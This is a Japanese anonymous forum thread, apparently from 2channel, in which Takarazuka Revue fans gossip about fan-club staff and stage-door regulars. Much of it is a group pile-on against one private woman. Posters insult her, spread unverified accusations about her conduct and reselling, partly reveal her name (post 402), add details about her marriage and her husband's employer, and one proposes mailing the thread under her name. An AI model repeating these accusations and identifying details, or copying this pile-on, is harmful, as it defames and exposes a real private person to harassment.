319 :名無しさん@花束いっぱい。:2006/12/25(月) 16:15:36 ID:FwnJ/I8b
ミズさん会に戻るんじゃない??


320 :名無しさん@花束いっぱい。:2006/12/25(月) 21:11:15 ID:t2HGrOEz
いらね

321 :名無しさん@花束いっぱい。:2006/12/25(月) 21:14:01 ID:xmYZ7Mww
千秋楽出待ちんとき、鳥女さんを見ました!頭に白いボンボンを2つつけてましたよ。

322 :名無しさん@花束いっぱい。:2006/12/25(月) 21:34:28 ID:3LW78MWw
>319
違う
ユミコ会

323 :名無しさん@花束いっぱい。:2006/12/25(月) 22:09:08 ID:DWgXv39l
宙2会のパタリロは何か問題起こしたらしい
詳しくは知らないけど

324 :名無しさん@花束いっぱい。:2006/12/25(月) 22:42:30 ID:Vv124sZd
春頃まで宙1会のスタッフ(アシスタント?)やってた子、
夏頃から某会の入りに並んでた。変装の真似事してさ。
会員から嫌われてたし、
1年ちょっとの間に3つの会を渡り歩いてるから、
変装する気持ちもわかるけど、かえって目立ってバレバレなんだよ。
ほとぼりがさめてきたのか、最近は徐々に変装を解きだしてる…。

325 :名無しさん@花束いっぱい。:2006/12/25(月) 23:30:44 ID:ebHvGWJg
花柄ワンピの常連カメおばちゃん…
『私と口聞いたらトドさん会員は退会なんやでー』

って言ってたけど本当?

326 :名無しさん@花束いっぱい。:2006/12/26(火) 02:07:18 ID:9lnOib0M
>>319
>>322
うちもイラネ

327 :名無しさん@花束いっぱい。:2006/12/26(火) 12:57:54 ID:/339PJbw
>>298
そんな最悪なことしてるんですか?
東京のほうだけど、私はスタッフさん優しい人ばっかりだと思いましたよ

328 :名無しさん@花束いっぱい。:2006/12/26(火) 19:43:20 ID:mcebtsZo
a

329 :名無しさん@花束いっぱい。:2006/12/26(火) 21:47:06 ID:WONn3liJ
>>298 >>327
私はムラですが、とても優しい方ばかりでした。
でももう皆で集まる事はないんですね・・・。

330 :名無しさん@花束いっぱい。:2006/12/26(火) 23:06:56 ID:M8nYvkoe
入りでガードが端の方になった時、コムスタ、文句タラタラでした
東宝ほぼ毎日いた、まだらな金髪のスタッフは、文句タラタラでしたよ。口も悪かった。そんな文句あるなら無理して来なければいいのにと思った。そら豆顔も愚痴るよね。あの調子なら見えないとこで更に言いたい放題やりたい放題なんじゃ?怖。
千秋楽ガード位置も、好き嫌い感情、大いに入ってるよな…あれじゃ。

331 :名無しさん@花束いっぱい。:2006/12/27(水) 00:02:06 ID:2FpLB965
そうなんだ

332 :名無しさん@花束いっぱい。:2006/12/27(水) 00:02:38 ID:kfvg/YQy
鳥さんの位置はどこだったの?

333 :名無しさん@花束いっぱい。:2006/12/27(水) 00:32:13 ID:nbMGvLzA
だって、あの代表だよ!
スタッフも類友なんじゃ。それにしても、あの代表いったい何人の人生狂わせたか。
天罰がくだるよ、きっと。
スレチでスマソ

334 :名無しさん@花束いっぱい。:2006/12/27(水) 00:35:45 ID:il00JPVR
>330          ふーん、そうなんだー。

335 :名無しさん@花束いっぱい。:2006/12/27(水) 01:00:44 ID:e4drnuSX
>330
あの、まだら金髪の子って何か感じ悪そうだったね。
私は会に入ってないから後ろの方で見てたけど
言い方とかも、すごいきつかったし歩き方もヒールの
ある靴をカタカタひきずるみたいに歩いてて下品だった。

336 :名無しさん@花束いっぱい。:2006/12/27(水) 02:16:14 ID:eUYQfee+
330さん、私もコムスタのガード時の愚痴、聞いたよ。
そうそう、まだらな金髪で 目がクリッとしてて可愛げなんだけど、いつも引きずったGパン履いてなかった?
たぶん同じ子だと思う。
いつも仕事の愚痴やスタッフの悪口をタラタラ。しかも「マジ、ウザくねっ!?」とか「ババ怒り!」とか凄く汚い言葉で言ってた。
コムちゃんの品まで落としてると思ったよ。
それで、遅れてガードに入る会員を「最後尾こちらでございま〜す」って急に声色変えて案内してて
凄い二重人格を目の当たりにしちゃって、こわっ!と思った。

337 :名無しさん@花束いっぱい。:2006/12/27(水) 15:51:07 ID:CLYezamU
>336
>遅れてガードに入る会員を「最後尾こちらでございま〜す」って急に声色変えて案内してて

会の仕事はちゃんとしてるんじゃん
会員にも「凄く汚い言葉」で喋ってたら満足?

338 :名無しさん@花束いっぱい。:2006/12/27(水) 18:25:48 ID:MCapQOdv
な○ちゃんはどこでも現れるな…
朝、ムラにいたと思ったら、夕方にはDCに出現。
うめちゃんだけ追っかけとけばいいのに。うざ!

339 :名無しさん@花束いっぱい。:2006/12/27(水) 20:02:03 ID:gmZe9UgC
な○ちゃんって何者?
みんな妙〜に気を使ってない?
な○っちゃんから写真買ってるからか?

340 :名無しさん@花束いっぱい。:2006/12/27(水) 21:59:07 ID:J1lVsVYS
な○ちゃんは本気で怒らせるとマジ恐いんだよ…
でかい声で怒鳴りまくるし、あちこちで同じ事何度も言いふらすし
昔は蹴られたり、殴られたりした人もいる
(その頃はアル中でいつも酔っ払ってたからな)

ウザい存在だけど、毎日居るのは止められないんだから
せめて機嫌よくしててもらいたいだけさ

341 :名無しさん@花束いっぱい。:2006/12/27(水) 23:22:14 ID:QTzwJDpf
>337さん
は?会員にも汚い言葉で喋ってたら満足?
意味がわからない
それこそ有り得ないし、最低。
じゃなくてその逆でしょ

会員に直接接してない時だって、ガード中スタッフと名乗ってそこにいる間は常に仕事中でしょ?
スタンバイしながらスタッフが筆頭に愚痴って
話しこんで品を下げてる
それに不満足

あんなんじゃ コム本人も私たち会員も うんざり。
まあもう過去の話しなんですけどね

342 :名無しさん@花束いっぱい。:2006/12/28(木) 08:13:01 ID:UmOtzdKT
なっちゃんはね…愛人の手により一家みんなで亡命しようとした時に国境付近で捕まって連れ戻される時にあまりのショボンに美しいかったブロンドのおぐしが…。

343 :名無しさん@花束いっぱい。:2006/12/28(木) 19:13:44 ID:UBvUytQL
>>341
>>337は、たがら皮肉ってるんジャマイカ…
マジレスしちゃいかんよ

344 :名無しさん@花束いっぱい。:2006/12/28(木) 20:30:44 ID:6cYlRCPC
age

345 :名無しさん@花束いっぱい。:2006/12/28(木) 21:23:24 ID:Cm6YL44p
>339
何か、昔 整体みたいな仕事してたと聞いた
ジェンヌが世話になったとか・・・ホントかな?

そういや、あいあいが自分の方から声かけて笑顔で話してたとこ見た

346 :名無しさん@花束いっぱい。:2006/12/28(木) 23:00:00 ID:SG4gy1hD
鳥女さんは、雪1会か雪2会に現れたんだろうか?

347 :名無しさん@花束いっぱい。:2006/12/29(金) 09:05:15 ID:u51HpCso
な○ちゃんがいる場所って一般人だったらガードに、「もう少し下がってください」とか言われそうだよね。
でも誰も何も言わないし、ジェンヌ自身すごく丁寧に接してるね。
な○ちゃんのお気には誰?レオン好きな気もする・・

348 :名無しさん@花束いっぱい。:2006/12/29(金) 14:49:56 ID:gTzVRGrW
>ジェンヌ自身すごく丁寧に接してるね。

そうしないとあの婆
大声で罵声浴びせたりするからね。

349 :名無しさん@花束いっぱい。:2006/12/29(金) 20:56:28 ID:KVu2P7LR
な○ちゃんはうめの大ファソ

350 :名無しさん@花束いっぱい。:2006/12/29(金) 22:31:02 ID:CwuF4Cyr
な○ちゃんてさ、誰のファンか聞いてこない?
で、2人以上いると「そんないっぱいじゃダメや〜!!」って怒る。コワ・・・。


351 :名無しさん@花束いっぱい。:2006/12/30(土) 00:15:37 ID:pLKE3uWz
夏の宙バウの出になっちゃんきてたなぁ〜で、アリスに話し掛けてたけどアリス逃げてたw
最後は小走りで逃げてたよ

352 :名無しさん@花束いっぱい。:2006/12/30(土) 20:07:34 ID:oryx9OkS
そら豆顔のスタッフって文句言うんだね
愚痴って、会員に対して?コムに対して?
コムちゃんもっと早く来てよ〜とか?

353 :名無しさん@花束いっぱい。:2006/12/30(土) 22:22:33 ID:4cENkAYD
ここに出てくる人達のあだ名が上手くできてて凄いねw考えた人よくとらえてるね

354 :名無しさん@花束いっぱい。:2006/12/31(日) 01:09:24 ID:22ABtDwg
コム会のそら豆って、
東会の色白で目がクリクリの若い子のこと?
いつも走り回って、大変そうだったけど。

355 :名無しさん@花束いっぱい。:2006/12/31(日) 11:43:02 ID:rluCZp7R
324の
宙1アシ含めて1年内に3つの会を渡り歩いてる変装オンナって、
「私が一番〜♪」の自意識過剰オンナのことかな?
自業自得で会に居づらくなったのに、
「宙1会の人たちに嫉妬されて、いじめられた」って
あちこちで言いふらしてるよ。
ウチの会からはいなくなってくれてせいせいしたけど、
移った会の皆様、お気の毒〜。
こいつが来たら、何か揉め事がおきる…まさに疫病神!

356 :名無しさん@花束いっぱい。:2006/12/31(日) 13:17:12 ID:iR8HcnSS
↑その人って・・・キム・・・かし・・・エリたん・・の人でしょ?

357 :名無しさん@花束いっぱい。:2006/12/31(日) 15:04:28 ID:rluCZp7R
変装オンナって、組替したとたん変装しなくなったぞ。
わかりやす過ぎ〜。
相変わらず、毎日1番に来て
スタッフづらして並んでるのを見た。
スタッフに取り入り、自分より新しい会員を取り込んで、
古参会員の悪口を吹き込み、優位に立とうと画策するのが
ヤツの常套手段。



358 :名無しさん@花束いっぱい。:2006/12/31(日) 17:59:49 ID:r6mOfZVf
へえぇ〜 そうなんだ。

359 :名無しさん@花束いっぱい。:2006/12/31(日) 18:55:36 ID:IsSecz0r
たしかに自意識過剰ではあるな。
でも>>357の言うような、故意とか悪意は感じないような。
見た感じ気弱そうだし…どうなんだろ。



360 :名無しさん@花束いっぱい。:2006/12/31(日) 20:07:50 ID:vWAdPqo5
まぁあちこちに贔屓がいるのも楽しくて良いんじゃない?
鳥女みたいにかけもちだけじゃなく金銭トラブル起こされるのは勘弁だけど…

361 :名無しさん@花束いっぱい。:2007/01/01(月) 14:32:44 ID:rW5DAqjN
烏女ってなあに?

362 :名無しさん@花束いっぱい。:2007/01/01(月) 19:46:46 ID:eThhPunw
>361
さかのぼって読んだ?

363 :名無しさん@花束いっぱい。:2007/01/02(火) 11:21:10 ID:njWn3GbS
変装オンナさんって若い子ですよね。
気弱とは思いませんが…。
一度隣りになって話した時に、
聞いてもいないのに自分の自慢話ばかり喋って
人の話は聞かない一方通行な感じだったので、
てっきり「頭のアヤシイ人」だと思ってました。

364 :名無しさん@花束いっぱい。:2007/01/02(火) 14:37:27 ID:LkGb9LgY
若い子?私元宙一のFCに長くいるけど誰のことをいってるんだろ…。春頃までいたってかいてあったから、てっきり元エアロビのインストラクターかとオモタよ。違うんだ〜誰のことだぁ?

365 :名無しさん@花束いっぱい。:2007/01/02(火) 14:41:56 ID:LkGb9LgY
よく読んでなかったorz 現宙1のことかぁ…元宙1かと…逝ってきます

366 :名無しさん@花束いっぱい。:2007/01/02(火) 15:56:41 ID:29p7zxOV
>>361
烏じゃなくて鳥だよ。

367 :名無しさん@花束いっぱい。:2007/01/02(火) 16:45:06 ID:cr/3iWf7
>>363
自慢ってどんなの?
苦労話は聞かされたが。



368 :名無しさん@花束いっぱい。:2007/01/02(火) 18:16:41 ID:8GvRHDpu
苦労話ってのも、「私はいい子なのに、嫉妬されていじめられてる可哀相な子ですう」調やったよ。
自分は常に犠牲者、まわりが悪いってね。
まあ、好きな会を渡り歩くのは勝手だけど、目立つことはしないのが賢明やね。
そうすれば、ここにも書かれなくてすむってもんだ。
…って言っても、「一番病」の人には無理な話か。

369 :名無しさん@花束いっぱい。:2007/01/02(火) 19:35:19 ID:zGPncKIk
↑ピアノの先生してた子でしょ。良い人には・・・おべんちゃらと自慢話・・・気に入らない人には挨拶もしない・・・感じの悪い子だったよ・・・

370 :名無しさん@花束いっぱい。:2007/01/03(水) 06:15:30 ID:lJTrATy7
ピアノの先生と聞いて納得。
かつての知り合いピアノの先生(自宅開業)が数人頭に浮かんだが、全て高ビーで性格悪かった…。

371 :名無しさん@花束いっぱい。:2007/01/03(水) 13:34:50 ID:xeqMOzcR
うんうん、挨拶しなかった。話し方もつっけんどうで、感じ悪〜って思ったよ。
アタシは気に入られてなかったんだな(笑)
でもスタッフにはめちゃ媚びうりまくり。
他の会員が話に入れないようにして独り占め状態で話すから、
コイツが来てから会の雰囲気が…何だかなあ〜だった。
357さんの言うとおりだと思う。
コイツに牛耳られないためにも、今の会の皆さん頑張って下さいね。

372 :名無しさん@花束いっぱい。:2007/01/03(水) 18:48:03 ID:mZs20GqZ
ここで話題の彼女、今日見て来た。
確かに一番に来てた。スタッフかと思ったよ。
スタッフと同じような色のマフラーをしてた。
仰るとおりスタッフとばかり話してた。
目付き悪いね。アゴ長いし。

373 :名無しさん@花束いっぱい。:2007/01/03(水) 20:53:59 ID:adspTjJt
↑そうやって・・・おいしい汁だけ吸ってまた違うジェンヌに行くんだよ〜!エリタンも気づいてるんじゃない?

374 :名無しさん@花束いっぱい。:2007/01/03(水) 22:26:35 ID:1fUZ5h1u
その子、東宝にも登場する?

375 :名無しさん@花束いっぱい。:2007/01/03(水) 22:46:51 ID:xeqMOzcR
「堕天使」の時に東宝にも出没してたよ〜。
もちろん一番狙いで。

376 :名無しさん@花束いっぱい。:2007/01/03(水) 23:56:21 ID:1fUZ5h1u
そっか、ありがと。
壮くんの入出ってわりと人数ひかえめだからすぐばれそう。


377 :名無しさん@花束いっぱい。:2007/01/04(木) 00:29:02 ID:lvpk1PWx
>人数ひかえめ

そう書かれると塩分みたいで微笑ましいw




378 :名無しさん@花束いっぱい。:2007/01/04(木) 04:55:13 ID:7M++L5XZ
花組公演では誰と会えるのかな…まだ、なっちゃんしか見たことないんで…

なっちゃんって、ジェンヌ(うめちゃんとか)以外にも、自分の近くにいる人には頻繁に話し掛けてるよね。あんまり近付きたくはないな…
前に、なっちゃんの近くで待ってた若いスタッフさんにしきりに話し掛けてて、かなりスタッフさんは困ってて、何か可哀相だった…

何かこうやって読んでると、不思議な人が多いね〜

379 :名無しさん@花束いっぱい。:2007/01/04(木) 08:36:28 ID:fVSpxJrB
>376
アゴですぐわかるよ!昔・・・音楽学校受験したこともあるらしいけど・・・自分をわかってないね!!

380 :名無しさん@花束いっぱい。:2007/01/04(木) 09:15:57 ID:AHLj1Miq
ヅカ受験してたの!?驚きだね〜。
確かバレエ留学してたとか、声楽もピアノも先生から認められてたとか、本人は豪語してたよ。
嘘くせ〜!

381 :名無しさん@花束いっぱい。:2007/01/04(木) 09:31:01 ID:beI6PzHo
聞くところによると……
変装オンナって、
変装してた頃、晴れの日はもちろん雨の日も夜も
顔が半分隠れるぐらい帽子を深々とかぶり、でかい眼鏡をかけてたらしい。
会席で観劇する時は、開演寸前まで帽子を取らなかったとか。
まるで逃亡者!!(本人はジェンヌ気取りのつもりか?)
こんな格好で手紙渡されても、胡散臭いヤツとしてインプットされるよね〜。
あ、目立つ事が快感なんだね。
その頃ここに書いててくれたら、見に行く楽しみがあったのに…残念。

382 :名無しさん@花束いっぱい。:2007/01/04(木) 10:51:03 ID:5WVyuyr/
>>378
あほか!ぼけ!見せもんちゃうぞ!! byな○ちゃん

383 :名無しさん@花束いっぱい。:2007/01/04(木) 18:47:19 ID:zWkbQ9Er
>そりゃ・・・現宙1会の会員やスタッフに会ったら大変だから・・・自衛してたんじゃない?いまは・・・宙1は東京行っちゃったから変装の必要もないもんね・・・根性悪・・・最低・・・

384 :名無しさん@花束いっぱい。:2007/01/04(木) 18:54:55 ID:lvpk1PWx
お茶会では変装してなかったよ。

385 :名無しさん@花束いっぱい。:2007/01/05(金) 01:04:13 ID:NowT4vzg
キム会からも隠れてた。

386 :名無しさん@花束いっぱい。:2007/01/05(金) 07:55:10 ID:/1h9M4sc
明日の並びは変装ですよ!みなさん・・・花3会を注目!!!

387 :名無しさん@花束いっぱい。:2007/01/05(金) 11:10:11 ID:w6GWFL+9
もう自衛の必要がなくなったと本人は思ってるから、
まずは自分の言いなりになりそうな若い会員を手なずけ、
常連じゃない会員と見たら露骨に擦り寄っていくぞ!
ヤツにメルアド・携帯番号を聞かれた方はご用心!!!

388 :名無しさん@花束いっぱい。:2007/01/05(金) 15:18:05 ID:u6TQE2b+
お願いだから、弁当を食いながら、花の道をうろつくのやめてくれ、な○ちゃん。

389 :名無しさん@花束いっぱい。:2007/01/05(金) 16:54:38 ID:EANsXk8S
>>388
ええ!?想像してしまった…一日中、花の道にいるのかな…

390 :名無しさん@花束いっぱい。:2007/01/06(土) 13:03:11 ID:iU/SCYK3
変装するのもなんだかなーだけど、
堂々とあっちの会、こっちの会それも若手の会を
渡り歩いてるのもなんだかね〜。(もしかしたら、ダブってるかも?)
会のない下級生を待っているのを見たこともあったな。



391 :名無しさん@花束いっぱい。:2007/01/06(土) 21:51:37 ID:pxWKXVVF
ええーっ!他にも手を出してるの?
あちこちで恨み買ってるし、とんでもない性悪オンナだね。
花3会も大変なヤツをしょい込んだもんだ。気の毒に。

392 :名無しさん@花束いっぱい。:2007/01/06(土) 23:03:45 ID:HAdf3Xqf
友達が花3会にいるorz
狙われなければいいけど・・・心配・・・

393 :名無しさん@花束いっぱい。:2007/01/07(日) 00:39:34 ID:Arr6uHNJ
↑気をつけるよう、教えてあげた方がいいのでは。
当の変装オンナはここに書かれてるの知ってるのかなあ。

394 :名無しさん@花束いっぱい。:2007/01/07(日) 01:42:35 ID:tkUoOzVf
花組の並びに変装して登場してたよ。
色んな会の人がいっぱいいるからね。

ヤツは自分が中心でいたいのさ。
だから自分が話の主でいられるような人ばかり引き込もうとする。
知らない間にヤツの派閥の中に入れられて、
嫌われ者軍団の一員となってしまう。
気をつけよう!!!
花3会の会員は、ヤツに近づくな!!


395 :名無しさん@花束いっぱい。:2007/01/07(日) 02:42:08 ID:1WbwTmc/
なっちゃんが、うめ茶の会場へのエレベーター乗るところを目撃しました。
お茶会行くほどのうめファンだということ知らなかったよ。
っていうか、エレベーター乗ったからには、会場に行くものと思いこんだんだけど、
参加したんだよね?

396 :名無しさん@花束いっぱい。:2007/01/07(日) 08:51:45 ID:eJkr3JBt
変装するということは・・・自分でもやましい事してるって自覚があるんだろうね。
まあでも・・・またすぐ別の会行くんじゃない?あ〜!でももう絶対同じ会には来ないで!!

397 :名無しさん@花束いっぱい。:2007/01/07(日) 09:08:35 ID:KAXFvAZf
な〇ちゃんは、うめ茶に25人連れていったって自慢してたよ
目標は30人だったらしく、5人足らなかったのを禿しく悔しがってたw
な〇ちゃんとしゃべると案外オモロイよ〜

398 :名無しさん@花束いっぱい。:2007/01/07(日) 09:20:47 ID:Arr6uHNJ
元の会に顔向けできないような事をしてきた証拠ですね。
これだけのレスがつくくらいだから、相当な嫌われ方!
変装オンナにベタベタ話し掛けられたり、懐かれたりした人は…
ヤツにとっては自分の意のままになるお人好しさんって事ですね。お可哀相に。

399 :名無しさん@花束いっぱい。:2007/01/07(日) 09:28:12 ID:eFKM8LMx
私の友達、現在進行形でお可哀相な人達の一人だ。

400 :名無しさん@花束いっぱい。:2007/01/07(日) 10:09:27 ID:Arr6uHNJ
昨日の会並びと購入は、可哀相な人達を網にかけるチャンスだったんじやない?
自分がいかにもこの会を仕切ってます風に声をかけまくっていたらしい。
変装オンナ、お前の薄笑いがブキミなんだよ!

401 :名無しさん@花束いっぱい。:2007/01/07(日) 11:40:58 ID:TNAqwNHe
↑この神経が信じられない・・・こんなに噂になっても懲りない奴・・・
まあ・・・獲物は本当に良い人をターゲットにしているからね・・・ずる賢いんだね。

402 :名無しさん@花束いっぱい。:2007/01/07(日) 14:29:46 ID:WpaufgVL
この変装女ホントにサイテーなヤツだ!ヤフオクで宙一のお茶会のDVD売りまくって荒稼ぎしてやがる!!サイテー女=名前つ〇たひ〇み、みんなひっかからないように気をつけて!

403 :名無しさん@花束いっぱい。:2007/01/07(日) 14:57:04 ID:Arr6uHNJ
↑それは旧姓。結婚したから変わってるはず。

404 :名無しさん@花束いっぱい。:2007/01/07(日) 15:31:53 ID:WpaufgVL
あの女、あの性格で結婚できたの!?

405 :名無しさん@花束いっぱい。:2007/01/07(日) 18:14:02 ID:IxWb2Xh1
東宝メインの花3会員なんだけど、変装オンナがわからん。1番狙いで入り出に出没?
スタッフに媚売りまくりのアゴ長?? 知らずにお近づきになってたらどうしよう・・・
ってか、そんなんで注目されるのは哀しいぜよ。。。>花3会

406 :名無しさん@花束いっぱい。:2007/01/07(日) 19:23:59 ID:tkUoOzVf
変装オンナって、この間の「堕天使」ムラのお茶会で全ツのメッセージパネルが当たった子でしょ。
皮肉にも、こういうヤツに当たっちゃうんだよねえ。

407 :名無しさん@花束いっぱい。:2007/01/07(日) 19:43:28 ID:ZPVoTMRz
もう少しで、たかちゃんのコンサート ピンハおばさんの
活躍の時だね

408 :名無しさん@花束いっぱい。:2007/01/07(日) 20:34:25 ID:s3P1PLnQ
変装女の夫は宝塚市職員らしいよ・・・計算高い奴・・・

409 :名無しさん@花束いっぱい。:2007/01/07(日) 20:58:45 ID:AviA1UGs
花三番手って今だれだっけ……

410 :名無しさん@花束いっぱい。:2007/01/07(日) 21:52:39 ID:TBfOMGAI
変装女って。
いわゆるばーばりー女?
だったらおいら、知ってるどころの話じゃない。ふーむ。

411 :名無しさん@花束いっぱい。:2007/01/08(月) 01:14:22 ID:VjebI5Xv
変装オンナ=ばーばりーオンナ。
こんな悪名高いヤツにメルアドとか個人情報を教えたら、悪用される危険性ありだよ。

412 :名無しさん@花束いっぱい。:2007/01/08(月) 02:31:57 ID:VVUATESN
>409
この度、新加入させて頂きました

413 :名無しさん@花束いっぱい。:2007/01/08(月) 04:24:50 ID:WQRG7vib
このバカ女、自分の都合のいい時しかメールしてこないよ。自分が取れすぎて余って困ったクソ席いりませんか〜?とか、自慢の時だけ!

414 :名無しさん@花束いっぱい。:2007/01/08(月) 05:26:32 ID:Qh6exPwy
ばーばりー女として語られてた時はどんなエピソードがあったんですか?

415 :名無しさん@花束いっぱい。:2007/01/08(月) 13:29:19 ID:VjebI5Xv
バーバリー、前は彼氏の話ばかりしてたよね。聞いてもいないのに。
その彼氏と結婚したのか?
コイツと親しくできる人って、同じように変わってるか、バカかだろう。
近づかない方が賢明なり!

416 :名無しさん@花束いっぱい。:2007/01/08(月) 18:38:03 ID:D/VKB/O+
変装バーバリー女、相変わらず毎日一番に入り出に来てるんだね。
そして、前と同じような所業をしつつあるようだ。
ヤツがのさばり出したら、これからもっと会の雰囲気が悪くなるよ。
花3会はどんどん会員を増やしていきたい時期なのに、
とんでもないヤツに入られたね〜。

417 :名無しさん@花束いっぱい。:2007/01/08(月) 18:50:34 ID:WQRG7vib
花3の代表さん、健気な感じの人なのに(T_T)このバカ女の悪行知らないのかな??

418 :名無しさん@花束いっぱい。:2007/01/08(月) 18:53:28 ID:G5kgVYrh
い、いらん。頼むからウチの会から消えてくれよ〜(涙)>変装オンナ

419 :名無しさん@花束いっぱい。:2007/01/08(月) 18:57:02 ID:WQRG7vib
コイツ宙一会居づらくなった時「私はただ純粋に歌劇を楽しみたいだけなのに…(T_T)何でイジメられなければならないのっ!」みたいな事言ってたよ。純粋に楽しみたいなら会を渡り歩くような事するな!!

420 :名無しさん@花束いっぱい。:2007/01/08(月) 21:30:42 ID:Qh6exPwy
会員がそれなりの態度取らないと変装オンナも会を辞めたりしないよね…花3会って優しそうだから追い出せないんじゃない?


421 :名無しさん@花束いっぱい。:2007/01/08(月) 22:12:43 ID:VjebI5Xv
なーにが「純粋」だ!このクソ変装オンナ!!
お前が本当はコムファンだってのは知ってるぞ。
「コムちゃんが一番好き」って、あちこちで言ってたよな。
かし会を辞めたのも、「かしちゃんが宙に組替えになっては、コムちゃんが観られなくなるから」って言ってたぞ。バカにしてる!
もちろん悪行の報いで総スカンをくって、居づらくなったのが大きかったんだけど。
コムちゃんが退団しちゃったから、花3会が居心地いいと居座るかもよ。
ご愁傷様です。

422 :名無しさん@花束いっぱい。:2007/01/08(月) 22:53:55 ID:tcc5cbQ/
本当に・・・自分に都合の良いことしか言わん奴やな!!
ここ印刷して花3&花3代表に送ってやろうか・・・
しかもアイツの名前で・・・

423 :名無しさん@花束いっぱい。:2007/01/08(月) 23:13:46 ID:WQRG7vib
そうそう!キ〇会にいる時から大のコ〇ファンで、「コ〇さん大好き!キ〇ちゃんは…5番目位に好き!」と言ってたよ。携帯アドも最初はk〇mu…だったし。だからしょっちゅうアド変えてたね。

424 :名無しさん@花束いっぱい。:2007/01/08(月) 23:15:42 ID:WQRG7vib
つまりコイツはそれなりの地位の人の会に入って、良い席のチケットを回してもらいたいだけ!!キ〇会の時も良い席もらってんのに、花出しとか手伝わされるって文句ばかり言ってたから。

425 :名無しさん@花束いっぱい。:2007/01/09(火) 00:55:47 ID:5vjQVi2M
「キ○ちゃんは5番目に好き」だとぉ!
ファンの前でそんなことを言うとは、ほんとに人の気持ちを考えない大馬鹿オンナだ!
だからこんなにあちこちで嫌われるんだよ。
じゃあ、花3は何番目なんだ?
会席でもコ○とキ○にだけオペラを上げてたらしいからキ○より下か?
花3会の皆様!こんなヤツに甘い汁を吸わせてていいのか!?

426 :名無しさん@花束いっぱい。:2007/01/09(火) 01:14:57 ID:KJThsAEe
かなり甘い汁吸ってる。
花3に大した興味も無いくせに…
確か前回ムラお茶会ではパネルも当たったけどテーブルも一番前の正面だった。
純粋に応援してるファンが可哀相だ。



427 :名無しさん@花束いっぱい。:2007/01/09(火) 01:17:19 ID:1NsiC/Th
>>425 下から2行&3行め、いらんがな。。。

428 :sage:2007/01/09(火) 01:19:19 ID:qNu39HNL
書けば書くほど、自分で身元を明かしているのが分からないのでしょうか?

すべて記録に残されていますので、調べれば分かることです。

名誉毀損を刑法、民法で調べて、自分の行為がどういう罪になりうるか 調べてみると、もうこれ以上書けなくなると思います。



429 :名無しさん@花束いっぱい。:2007/01/09(火) 01:59:34 ID:SCmEsLzi
>>428
本人?

430 :名無しさん@花束いっぱい。:2007/01/09(火) 02:02:01 ID:TRMnBSOb
>429
じゃね?

431 :名無しさん@花束いっぱい。:2007/01/09(火) 02:02:34 ID:TRMnBSOb
連続すまそ

>428
さげ方間違えてるよ

432 :名無しさん@花束いっぱい。:2007/01/09(火) 08:51:26 ID:FPHFv/o8
確かに事実としてもエスカレートしすぎた感じはしますが…
でも普通こんなにレスが続かないし、ここまで書かれる?
これだけの人があなたの言動に傷ついたり、
ムカついたりしてることもちゃんと考えるべきではないでしょうか?

433 :名無しさん@花束いっぱい。:2007/01/09(火) 10:46:49 ID:4Lu95TLT
「訴える」と書いたらすべて止まると思ってる?
ここで仮にかかなくとも、人から人へ話は伝わるよ。
人の口に戸は立てられないからね〜


434 :名無しさん@花束いっぱい。:2007/01/09(火) 20:24:41 ID:tkB9vXdc
変装女さんへ・・・
読んで下さってありがとうございます。
あなたの言動が人をとっても不快にさせますので・・・二度と入り出にはいらしゃらないでください。
お願いです。

435 :名無しさん@花束いっぱい。:2007/01/09(火) 23:17:42 ID:LbWM8KuE
ここのスレタイは、気に入らない奴をみんなでいじめるスレに変更するべきだね。

436 :名無しさん@花束いっぱい。:2007/01/09(火) 23:46:26 ID:xCj2fSfF
変装女よりもタニ会をどうにかしてくれ…
ムラ楽で「入りのセレモニーはうちとかしさんとこでしますので、
他の会は来ないでください」って…

437 :名無しさん@花束いっぱい。:2007/01/09(火) 23:53:08 ID:FPHFv/o8
↑それはFCスレの方へ。

438 :名無しさん@花束いっぱい。:2007/01/10(水) 07:19:20 ID:je2Uh7gz
この間の雪のときもそうだったよ。
二番手以外追い出された。さらに、劇場付近に近づかないように隔離された。

439 :名無しさん@花束いっぱい。:2007/01/10(水) 07:25:38 ID:NBzZYUAr
竜馬のガードも、それまでと違って雪組式になってたらしいから
楽も、それが雪組式なのかなぁ。
粘楽は、組子会が入りガードしたからね。

440 :名無しさん@花束いっぱい。:2007/01/10(水) 09:37:54 ID:6+5e1+k3
お客様席も雪関係者が多いし・・。一時的に第2の雪かな?
2代表さん、スタイル変わってなかった。誤解するよね。

441 :名無しさん@花束いっぱい。:2007/01/10(水) 11:28:59 ID:rdFO5U8F
あれは雪式。今の宙は雪式そのまんま。つまりは花組式だと。
ネバ楽ガードは特定会だけだよ。ともちん、アヒ、和の会だけ。
あれは義務ってかご褒美みたいなもん。人数出した会だけ遠くから見れる。

雪式は止めて欲しいと下級生会からは不評。
出のガード場所とかな…タニ会はまた和央式に変えるかな?
和央会は下級生に甘々(放任)だったから余計かし会がウザく思えるらしい。
タニ会になったらどうすんだよ。ゾフィーよりウザイやまんばだぜ?w

442 :名無しさん@花束いっぱい。:2007/01/10(水) 11:46:36 ID:XyddZe2q
(*゚ー゚)bだぜ!

443 :名無しさん@花束いっぱい。:2007/01/10(水) 13:35:03 ID:ra5HIE+x
ゆうこりんゲットだぜ!!

444 :名無しさん@花束いっぱい。:2007/01/10(水) 13:57:28 ID:ID0aW09h
ゆうこりん=タニ会代表だっけ??

445 :名無しさん@花束いっぱい。:2007/01/10(水) 23:58:18 ID:KilUTPy/
常連の皆さんってどんな仕事してるんですか?

446 :名無しさん@花束いっぱい。:2007/01/11(木) 01:00:41 ID:p2LIsJp5
粘楽でも下級生会はガード(劇場付近)に近づくなって指令出てたよね。
これは、タニオカ会の指令?和央会の指令?

84 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)